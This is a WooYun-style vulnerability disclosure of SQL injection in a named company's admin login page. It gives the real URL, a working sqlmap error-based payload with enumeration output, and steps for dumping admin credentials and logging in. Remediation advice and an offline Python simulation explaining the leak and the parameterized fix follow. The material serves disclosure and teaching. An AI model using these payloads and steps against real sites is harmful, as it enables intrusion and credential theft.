WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------------- http://drop.zone.ci/
2015-11-05: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public.
2015-12-20: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
Capture a login request to the backend login form (http://www.tlqh.com.cn/manager/Login.aspx) with Burp, save the raw request to a file, and feed that file to sqlmap. The POST field txtname is injectable (MSSQL, error-based).
1. First, list the available databases:
Parameter: txtname (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKLTUwOTQ0NDQ3MWRkG4evLtrTgC3zhxkpHqYKHwmg4AA=&__VIEWSTATEGENERATOR=6942E586&__EVENTVALIDATION=/wEWBAL1uKqqAgLEhISACwKd+7q4BwKp8pn0BZ2S3vC+NXfN7AJV6RSr9xcmsIso&txtname=admin' AND 3221=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3221=3221) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(106)+CHAR(113)))-- SziJ&txtpwd=123456&tijiao=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] tonglianQH
2. The current database is tonglianQH; list the tables in it:
Database: tonglianQH
[20 tables]
+------------------+
| B_Admin          |
| B_Keyword        |
| B_PageMenu       |
| B_PagePower      |
| B_RolePower      |
| B_RolePower      |
| B_SEOInfo        |
| ShaoMiaoType     |
| Web_AboutMenu    |
| Web_Case         |
| Web_CaseType     |
| Web_IndexImg     |
| Web_Job          |
| Web_MenuPage     |
| Web_Message      |
| Web_News         |
| Web_NewsType     |
| Web_ShaoMiaoCase |
| Web_YRZZImg      |
| web_link         |
+------------------+
3. Next, the columns of the B_Admin table:
Database: tonglianQH
Table: B_Admin
[11 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| AID           | int      |
| CDate         | datetime |
| ISDelete      | int      |
| ISLock        | int      |
| LastLoginDate | datetime |
| LastLoginIP   | varchar  |
| LoginName     | varchar  |
| LoginTime     | int      |
| Name          | varchar  |
| Password      | varchar  |
| RID           | int      |
+---------------+----------+
4. Dump the contents of the Name, LoginName and Password columns (shown as a screenshot, since it is hard to redact otherwise).
5. Incidentally, the database user is sa, which carries very high privileges:
6. Use the dumped credentials to log into the backend as the administrator (backend: http://www.tlqh.com.cn/manager/Login.aspx).
Fix: filter and validate the login parameters, or better, stop concatenating txtname into the query and use parameterized queries; also run the application under a low-privilege database account rather than sa. The backend admin password is weak as well and should be changed.
Vendor could not be contacted, or the vendor actively refused.
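How the sqlmap payload in step 1 actually leaks data, and why the parameterized fix stops it, as an added example that is not part of the original report. MSSQL's CONVERT(INT, <non-numeric string>) fails with an error whose text quotes the offending string, so sqlmap wraps the value it wants between two marker strings (the CHAR() runs in the payload spell 'qjqqq' and 'qkpjq') and reads it back out of the error message. The FakeLoginPage class is a constructed stand-in for Login.aspx: it assumes the page concatenates txtname into the WHERE clause and surfaces the raw SQL error (which is what the sqlmap result implies), and it understands only the two subquery shapes used here. The B_Admin rows, the login_safe method and the leak/is_true helpers are assumptions for illustration; nothing touches the network.

```python
import re

# The two marker strings from the page's payload, spelled out:
#   CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(113) -> 'qjqqq'
#   CHAR(113)+CHAR(107)+CHAR(112)+CHAR(106)+CHAR(113) -> 'qkpjq'
PREFIX = "qjqqq"
SUFFIX = "qkpjq"


def chars(s):
    """Spell a string as T-SQL CHAR() concatenation, as sqlmap does to avoid quotes."""
    return "+".join("CHAR(%d)" % ord(c) for c in s)


def error_payload(inner_sql, n=3221):
    """Build the page's error-based payload around an arbitrary scalar subquery."""
    return ("admin' AND %d=CONVERT(INT,(SELECT %s+%s+%s))-- SziJ"
            % (n, chars(PREFIX), inner_sql, chars(SUFFIX)))


class MsSqlError(Exception):
    """Stands in for the database exception the ASP.NET error page exposes."""


class FakeLoginPage:
    """Constructed stand-in for the vulnerable Login.aspx (assumption, see lead-in)."""

    # Constructed rows; the real values are redacted in the report.
    B_ADMIN = [{"LoginName": "admin", "Password": "123456", "Name": "Administrator"}]

    def login(self, txtname, txtpwd):
        # Vulnerable pattern: user input concatenated straight into the query.
        query = ("SELECT * FROM B_Admin WHERE LoginName='%s' AND Password='%s'"
                 % (txtname, txtpwd))
        return self._execute(query)

    def login_safe(self, txtname, txtpwd):
        # Fix: the input never reaches the SQL parser, so CHAR()/CONVERT in it is
        # just a string. Stands in for a parameterized SqlCommand (assumption).
        for row in self.B_ADMIN:
            if row["LoginName"] == txtname and row["Password"] == txtpwd:
                return "ok"
        return "login failed"

    def _execute(self, query):
        # Fold CHAR(n) into quoted literals, then merge 'a'+'b' into 'ab'.
        sql = re.sub(r"CHAR\((\d+)\)", lambda m: "'%s'" % chr(int(m.group(1))), query)
        while True:
            merged = re.sub(r"'([^']*)'\+'([^']*)'", r"'\1\2'", sql)
            if merged == sql:
                break
            sql = merged
        m = re.search(r"CONVERT\(INT,\(SELECT '([^']*)'\+\((.+)\)\+'([^']*)'\)\)", sql)
        if not m:
            # Normal path: plain credential match on the concatenated query.
            cred = re.search(r"LoginName='([^']*)' AND Password='([^']*)'", query)
            if cred:
                name, pwd = cred.groups()
                if any(r["LoginName"] == name and r["Password"] == pwd for r in self.B_ADMIN):
                    return "ok"
            return "login failed"
        prefix, inner, suffix = m.groups()
        text = prefix + self._scalar(inner) + suffix
        # MSSQL error 245 quotes the whole varchar it could not convert.
        raise MsSqlError("Conversion failed when converting the varchar value '%s' "
                         "to data type int." % text)

    def _scalar(self, inner):
        # Only the two subquery shapes used in this example are understood.
        m = re.fullmatch(r"SELECT \(CASE WHEN \((\d+)=(\d+)\) THEN '(.)' ELSE '(.)' END\)", inner)
        if m:
            a, b, yes, no = m.groups()
            return yes if int(a) == int(b) else no
        m = re.fullmatch(r"SELECT TOP 1 (\w+) FROM B_Admin", inner)
        if m:
            return self.B_ADMIN[0][m.group(1)]
        raise MsSqlError("Incorrect syntax near '%s'." % inner[:20])


def leak(page, inner_sql):
    """Send the payload and pull the leaked value out from between the markers."""
    try:
        page.login(error_payload(inner_sql), "123456")
    except MsSqlError as e:
        m = re.search(re.escape(PREFIX) + "(.*?)" + re.escape(SUFFIX), str(e))
        if m:
            return m.group(1)
    return None


def is_true(page, condition):
    """The page's own probe: CASE WHEN (<cond>) THEN CHAR(49) ELSE CHAR(48) END -> '1'/'0'."""
    inner = "(SELECT (CASE WHEN (%s) THEN CHAR(49) ELSE CHAR(48) END))" % condition
    return leak(page, inner) == "1"


if __name__ == "__main__":
    page = FakeLoginPage()
    print(is_true(page, "3221=3221"), is_true(page, "3221=3222"))
    print(leak(page, "(SELECT TOP 1 LoginName FROM B_Admin)"),
          leak(page, "(SELECT TOP 1 Password FROM B_Admin)"))
    print(page.login_safe(error_payload("(SELECT TOP 1 Password FROM B_Admin)"), "123456"))
```

The probe in step 1 is sqlmap confirming the oracle: 3221=3221 is trivially true, so a '1' between the markers in the error text proves the column is injectable and that error messages reach the client. Swapping the CASE subquery for SELECT TOP 1 Password FROM B_Admin is all that separates that probe from the credential dump in step 4. Against login_safe the same payload is just a username that matches no row.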